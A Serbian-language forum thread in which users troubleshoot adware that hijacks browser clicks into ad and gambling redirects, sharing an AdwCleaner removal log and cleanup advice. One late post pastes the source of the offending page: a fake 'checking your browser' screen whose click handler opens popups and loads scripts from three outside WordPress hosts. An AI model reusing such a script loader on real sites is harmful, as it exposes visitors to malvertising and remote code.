[ pexus @ 25.01.2016. 11:04 ] @
Problem:
S'vremena na vreme, na Chrome-u, a i na Firefox-u, neki softver mi prilikom pokušaja klika na na stranici (bilo da je to klik na link, ili samo zelja da se postavi kursor), umesto zeljene akcije, otvori novi tab sa redirekcijom na neku nasumični stranicu (obično neke reklame, game ili kockasrski sajtovi...).
Sad sam uočio da će ta redirekcija uslediti kada kursor dovedem na npr. neki link, a on se ne promeni iz strelice u kažiprst. Nisam uočio pravilo da li se to dešava nakomn odredjenog broja klikova (možda posle 20-30 normalnih klikova na linkove) ili nakon odredjenog vremenskog perioda (svakih 5-10min možda).
Pretpostavljam (siguran sam) da sam to zapatio, kada sam pokušao instalaciju nekog malog programčića (pre 3-4 nedelje) za povrat izbrisanih fotki sa kartice (torrent :( ). To sam deinstalirao, ali je virus/softver negde ostao, a ja ne mogu da ga nađem. Nema ga ni u listi za Uninstal u Control panelu.
Nije u extenzijama ni Chroma i Firefoxa, ne sredjuju ga ni Free Avast, a ni Spy boot S&D...
Ima li neko neki savet za rešenje ovog dosadnog problema.

[Ovu poruku je menjao pexus dana 25.01.2016. u 12:15 GMT+1]
[ anon142305 @ 25.01.2016. 11:14 ] @
Vidi sta kazu AdwCleaner i Malwarebytes Anti-Malware.
I pogledaj sta ima u start up-u.
[ pexus @ 25.01.2016. 11:48 ] @
^ HVALAA :)

Izgleda je AdwCleaner resio problem. Brzo je skenirao ono što misli da treba i pošistio neke foldere/fajlove.... i za sada izgleda sve ok
Evo šta je počistio:



# AdwCleaner v5.030 - Logfile created 25/01/2016 at 12:23:00
# Updated 17/01/2016 by Xplode
# Database : 2016-01-25.1 [Server]
# Operating system : Windows 7 Ultimate (x64)
# Username : Korisnik - KORISNIK-PC
# Running from : I:\DOWNLOADS\Softver\ADW cleaner\adwcleaner_5.030.exe
# Option : Cleaning
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[#] Folder Deleted : C:\Program Files (x86)\Coupons
[#] Folder Deleted : C:\Program Files (x86)\focusbase
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[#] Folder Deleted : C:\Users\Korisnik\AppData\Local\Temp\focusbase
[#] Folder Deleted : C:\Users\Korisnik\AppData\LocalLow\HPAppData
[#] Folder Deleted : C:\Users\Korisnik\AppData\Roaming\HPAppData
[#] Folder Deleted : C:\Users\Korisnik\AppData\Roaming\SimpleFiles

***** [ Files ] *****

[-] File Deleted : C:\Users\Korisnik\AppData\Roaming\Mozilla\Firefox\Profiles\a0x11qfx.default\user.js

***** [ DLLs ] *****


***** [ Shortcuts ] *****

[-] Shortcut Disinfected : C:\Users\Public\Desktop\Google Chrome.lnk
[-] Shortcut Disinfected : C:\Users\Public\Desktop\Mozilla Firefox.lnk
[-] Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[-] Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk
[-] Shortcut Disinfected : C:\Users\Korisnik\Desktop\Tor Browser\Start Tor Browser.lnk
[-] Shortcut Disinfected : C:\Users\Korisnik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
[-] Shortcut Disinfected : C:\Users\Korisnik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
[-] Shortcut Disinfected : C:\Users\Korisnik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
[-] Shortcut Disinfected : C:\Users\Korisnik\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[-] Shortcut Disinfected : C:\Users\Korisnik\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk

***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]]
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] Key Deleted : HKCU\Software\OB
[-] Key Deleted : HKCU\Software\PRODUCTSETUP
[-] Key Deleted : HKCU\Software\SimpleFiles
[-] Key Deleted : HKLM\SOFTWARE\SimpleFiles
[-] Data Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
[-] Data Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
[-] Data Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
[-] Data Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]

***** [ Web browsers ] *****

[-] [C:\Users\Korisnik\AppData\Roaming\Mozilla\Firefox\Profiles\a0x11qfx.default\prefs.js] [Preference] Deleted : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[-] [C:\Users\Korisnik\AppData\Roaming\Mozilla\Firefox\Profiles\a0x11qfx.default\prefs.js] [Preference] Deleted : user_pref("extensions.quick_start.enable_search1", false);
[-] [C:\Users\Korisnik\AppData\Roaming\Mozilla\Firefox\Profiles\a0x11qfx.default\prefs.js] [Preference] Deleted : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : file-scavenger.en.softonic.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : passport-photo-maker.en.softonic.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : cardrecovery.en.softonic.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : color-efex-pro.en.softonic.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : megasync.en.softonic.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : card-recovery-pro.en.softonic.com
[-] [C:\Users\Korisnik\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : reeltimegaming.com

*************************

:: "Tracing" keys removed
:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [5692 bytes] ##########
[ pexus @ 25.01.2016. 11:54 ] @
Ipak nije :(
Evo malopre mi opet uradi otvaranje novog tab-a na neku reklamu, i to baš kad htedoh da proverim ovu temu.
grrrr
[ anon142305 @ 25.01.2016. 17:44 ] @
A ovo?

Citat:

Malwarebytes Anti-Malware.
I pogledaj sta ima u start up-u.
[ pexus @ 25.01.2016. 21:11 ] @
Probao i to. Isto.
Sad mi iskače i Pop up reklama za neki "ecosmartfilter" za čišćenje add-onsa, a Malwarebytes prijavljuje njihow site kao maliciozan...
[ Zlatni_bg @ 26.01.2016. 00:51 ] @
Uvek najsigurniji nacin reinstalacija sistema. I posle toga pazi sta instaliras. Nikad ne znas sta ce taj anti-malware pokupiti a sta nece. Licni podaci nisu za igru.
[ iculibrk @ 26.01.2016. 09:40 ] @
Pokusaj prvo sa programom Webroot. Ja sam svojevremeno pokupio neku slicnu dosadu, probao sa Adw, Malwarebytes, SuperAnti... svi su nalazili nesto ali se ovek pojavljivao redirekt. Posle skeniranja ovim programom i uklanjanjem vise se nije pojavljivao.
Ako ne uspes, najjednostavnije resenje ti je reinstalacija.
[ vladant @ 26.01.2016. 11:10 ] @
Pogledaj kako treba da izgleda "hosts" fajl:
link
link

Verovatno je izmenjen, ja sam na ovaj nacin uspeo da resim slican problem.

Akko je potrebno jos nesto, neko ce vec napisati...
[ pexus @ 27.01.2016. 10:11 ] @
Izgleda su ona dva čistača (AdwCleaner i Malwarebytes + moj SpyBoot S&D + Avast.. ? ) ipak odradili posao, samo je trebalo još par reseta da se sve očisti. Evo, za sada, već drugi dan se ništa neželjeno ne otvara.
[ since1986BC @ 03.05.2020. 17:35 ] @
Imam sličan problem pa ću na istoj temi, jeste malo stara (4 godine) ali da ne otvaram novu.

Povremeno imam problem sa linkovima, čak i sa onim na Wikipediji koji me redirektuju, na reklame.
Ne kao autor teme ako pređem strelicom preko, već samo ako kliknem na njih.
Ako opet probam da kliknem - ne redirektuju nego otvore sadržaj koji bi trebalo.

Koristim Linux Mint najčešće ali se i na Windowsu dešava.
Čistio keš iz browsera, skenirao mašine (Malwarebytes, FSecure IS, ClamAV) i ništa.
Sveže apdejtovani Chrome i Firefox, sa uBlock Origin.

Konkretno danas, ovo je problematičan link
Code:
http://forum.b92.net/index.php?showtopic=41618

a do njega sam došao preko Wikipedije u ovom članku (Kip Slobode)
Code:
https://sr.wikipedia.org/wiki/%D0%A0%D0%B0%D0%B7%D0%B3%D0%BE%D0%B2%D0%BE%D1%80:%D0%9A%D0%B8%D0%BF_%D1%81%D0%BB%D0%BE%D0%B1%D0%BE%D0%B4%D0%B5



Nalazio sam razne problematične linkove, online skeneri to u 99% slučajeva prijavljuju kao bezbedno.
[ Branimir Maksimovic @ 03.05.2020. 18:07 ] @
To te redirektuje stranica sa koje ides na link, nije u linku problem. Ne moze se protiv toga nista uraditi, samo da izbegavas takve strane.
edit:
hm, ta viki stranica deluje ok, jedino sto mi je privoxy tu blokirao je google analitycs. Proveri da usput nisi
zapatio neki malware? Probaj to bez ekstenzija, mozda ti bas ekstenzija uvaljuje reklame?
[ Living Light @ 03.05.2020. 18:15 ] @
Branimire, znaš ti jako dobro da ja nemam blage veze sa IT.

Ali sam uspeo (uz pomoč sa neba) da instaliram neke silne "AD-IN-ON" blokere,
za Chrom, Mozilu, Operu, i ostale browsere.

Tako da mi sada malkice sporije otvara stranicu,
ali mi više ama baš ništa ne blinka kao božična jelka.

Sve je "Klot!" . čisto!

[ since1986BC @ 03.05.2020. 18:16 ] @
@Branimir Maksimovic
Obično su to čiste strane. Koliko današnji web može biti čist. Nisu strane sa piratskim sadržajem, pornografijom i tome slično.
Hvala na odgovoru.
[ Branimir Maksimovic @ 03.05.2020. 18:16 ] @
Pa pazi imas recimo brave browser za kojim je sad hype, a malo njih zna da je taj browser osim sto blokira reklame i crypto miner..
[ since1986BC @ 03.05.2020. 18:27 ] @
@Branimir Maksimovic
E hvala što si skrenuo pažnju na Extenzije browsera, imam ih par. To sam potpuno smetnu.

A to za Brave ne znam. Koristim isključivo čistokrvne browsere: Google Chrome, Mozilla Firefox.
Ostale zahebancie me ne zanimaju. Vivaldi možda iz nostalgije prema Opera browseru.
[ gilopile @ 03.05.2020. 18:29 ] @
Samo ti preskeniraj i ocisti adware:
https://www.malwarebytes.com/adwcleaner/

I zatim instaliras adwblocker i nema problema. Gasis ga po potrebi gde ne mozes da vidis sadrzaj ako je ukljucen...
Odavno koristim adblocker za chrome i veruj mi da ne mogu vise bez njega... kad vidim sta mi sve otvori kad ga sikljucim...sve zivo i mrtvo
[ Living Light @ 03.05.2020. 18:34 ] @
Draganče, kad god si to savetovao (a bilo jedno par desetina puta),
ja to uradim i --N I Š T A nije našao!!!

Eo, sad ću da uradim ponovo.


[ since1986BC @ 03.05.2020. 18:40 ] @
@gilopile
^ Da, naravno. Na Linuxu mi to nema mnogo značaja. Tamo sam jednom/dvaput iz dosade ClamAv i Sophos probao. Ništa.

Od skora koristim Firefox Preview za Android. Može se za sada po neka eksenzija. uBlock Origin ima po defaultu, valjda ga samo treba aktivirati.
Preporodio se.
https://play.google.com/store/...id=org.mozilla.fenix&hl=en
[ Branimir Maksimovic @ 03.05.2020. 18:40 ] @
Citat:
gilopile:
Samo ti preskeniraj i ocisti adware:
https://www.malwarebytes.com/adwcleaner/

I zatim instaliras adwblocker i nema problema. Gasis ga po potrebi gde ne mozes da vidis sadrzaj ako je ukljucen...
Odavno koristim adblocker za chrome i veruj mi da ne mogu vise bez njega... kad vidim sta mi sve otvori kad ga sikljucim...sve zivo i mrtvo


Nece to pomoci na Linux-u.
[ Branimir Maksimovic @ 03.05.2020. 18:47 ] @
Citat:
since1986BC:
@gilopile
^ Da, naravno. Na Linuxu mi to nema mnogo značaja. Tamo sam jednom/dvaput iz dosade ClamAv i Sophos probao. Ništa.

Od skora koristim Firefox Preview za Android. Može se za sada po neka eksenzija. uBlock Origin ima po defaultu, valjda ga samo treba aktivirati.
Preporodio se.
https://play.google.com/store/...id=org.mozilla.fenix&hl=en


Ja samo jednom nedeljno ovo uradim na ruteru :P
Code:

bmaxa@RT-AC58U:/tmp/mnt/Entware# ./privoxy-blocklist.sh 
./privoxy-blocklist.sh: line 208: source: /opt//etc/privoxy: is a directory
Processing https://easylist-downloads.adblockplus.org/easylistgermany.txt ...

Downloading https://easylist-downloads.adblockplus.org/easylistgermany.txt ...
.. downloading done.

Modifying /opt/etc/privoxy/config ...
... modification done.

Installing new config ...
... installation done

... https://easylist-downloads.adblockplus.org/easylistgermany.txt installed successfully.

Processing http://adblockplus.mozdev.org/easylist/easylist.txt ...

Downloading http://adblockplus.mozdev.org/easylist/easylist.txt ...
.. downloading done.

Modifying /opt/etc/privoxy/config ...
... modification done.

Installing new config ...
... installation done

... http://adblockplus.mozdev.org/easylist/easylist.txt installed successfully.

bmaxa@RT-AC58U:/tmp/mnt/Entware# /opt/etc/init.d/S
/opt/etc/init.d/S09dnscrypt-proxy2  /opt/etc/init.d/S24privoxy
bmaxa@RT-AC58U:/tmp/mnt/Entware# /opt/etc/init.d/S24privoxy restart
 Shutting down privoxy...              done. 
 Starting privoxy...              done. 


[ since1986BC @ 03.05.2020. 18:51 ] @
Gasim jednu po jednu ekstenziju. Evo opet redirekcije. Zaustavio na ovome.
screenshot


page source
Code:

<!DOCTYPE html><html lang="en"><style>.lds-spinner {  color: official;  display: inline-block;  position: relative;  width: 80px;  height: 80px;}.lds-spinner div {  transform-origin: 40px 40px;  animation: lds-spinner 1.2s linear infinite;}.lds-spinner div:after {  content: " ";  display: block;  position: absolute;  top: 3px;  left: 37px;  width: 6px;  height: 18px;  border-radius: 20%;  background: #000;}.lds-spinner div:nth-child(1) {  transform: rotate(0deg);  animation-delay: -1.1s;}.lds-spinner div:nth-child(2) {  transform: rotate(30deg);  animation-delay: -1s;}.lds-spinner div:nth-child(3) {  transform: rotate(60deg);  animation-delay: -0.9s;}.lds-spinner div:nth-child(4) {  transform: rotate(90deg);  animation-delay: -0.8s;}.lds-spinner div:nth-child(5) {  transform: rotate(120deg);  animation-delay: -0.7s;}.lds-spinner div:nth-child(6) {  transform: rotate(150deg);  animation-delay: -0.6s;}.lds-spinner div:nth-child(7) {  transform: rotate(180deg);  animation-delay: -0.5s;}.lds-spinner div:nth-child(8) {  transform: rotate(210deg);  animation-delay: -0.4s;}.lds-spinner div:nth-child(9) {  transform: rotate(240deg);  animation-delay: -0.3s;}.lds-spinner div:nth-child(10) {  transform: rotate(270deg);  animation-delay: -0.2s;}.lds-spinner div:nth-child(11) {  transform: rotate(300deg);  animation-delay: -0.1s;}.lds-spinner div:nth-child(12) {  transform: rotate(330deg);  animation-delay: 0s;}@keyframes lds-spinner {  0% {    opacity: 1;  }  100% {    opacity: 0;  }}</style><body onclick=Go();><center><h1>Checking your browser before accessing</h1>This process is automatic . Your browser will redirect to yours requested content...<br><br><div class="lds-spinner"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div><br><br><a href=# id="continue" style="display:none">Click here to continue...</a><br><script type="text/javascript">function Go(){
var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1000));
document.cookie = "a=a; expires=" + date.toGMTString();
window.open(safrgdfhtu); window.location.reload(true);
}</script>
<script type="text/javascript" src="http://zazalanoisette.com/wp-content/scr.php"></script>
<script type="text/javascript" src="http://steveedwardsgolf.com/wp-content/scr.php"></script>
<script type="text/javascript" src="http://prcomputer.hu/wp-content/scr.php"></script>
[ gilopile @ 03.05.2020. 18:53 ] @
@Loving, evo i ja probao da preskeniram sa adwcleaner-om i nije ni jedan nasao.

Sa adblock je uzivancija surfati.
Samo neki debilni sajtovi nece komplet da prikazu sadrzaj ako je blocker ukljucen. Al takvi su uglavnom za izbegavati, jer nista pametno neces tu ni procitati, sem da nekome kupujes klikove :D

Izvinjavam se, nisam znao da je za Linux potrebno.
[ Branimir Maksimovic @ 03.05.2020. 18:56 ] @
To neki sajtovi ubacuju u zadnje vreme, ne znam zasto, ali to me ne redirektuje za sada.
[ gilopile @ 03.05.2020. 18:59 ] @
Da, Maxo, nema ih mnogo za sada.
Obicno kada treba da skinem neku semu, FW i sl. Onda jedno 4 klik sajta sa onim odbrojavanjem i `ja nisam robot` dok dodjes do linka. Al ok, nije problem usluga za uslugu i drago mi je da na taj nacin nekome bar zaradim neki cent.

Tragedija je kad te provoza i na kraju corak :)
Bar u poslednje vreme nema redirekcije na pusikar sajtove. Ne pamtim kad sam zadnji put vidio...obicno YT ili reklamni sadrzaj tehnike i sl.
[ Living Light @ 03.05.2020. 19:20 ] @
Citat:
Branimir Maksimovic: ne znam zasto, ali to me ne redirektuje za sada.

Hvala svevišnjem, da me ništa ne redirektuje nigde :)

na WIN7, 16 Gb RAM, ostalo ne znam :)
[ Living Light @ 04.05.2020. 10:04 ] @
Citat:
gilopile: Onda jedno 4 klik sajta sa onim odbrojavanjem i `ja nisam robot` dok dodjes do linka.

Meni je ovo već sumnjivo.

Čim ti trebaš da popunjavaš "puzle" da bi došao do šeme,
odma mi ne treba.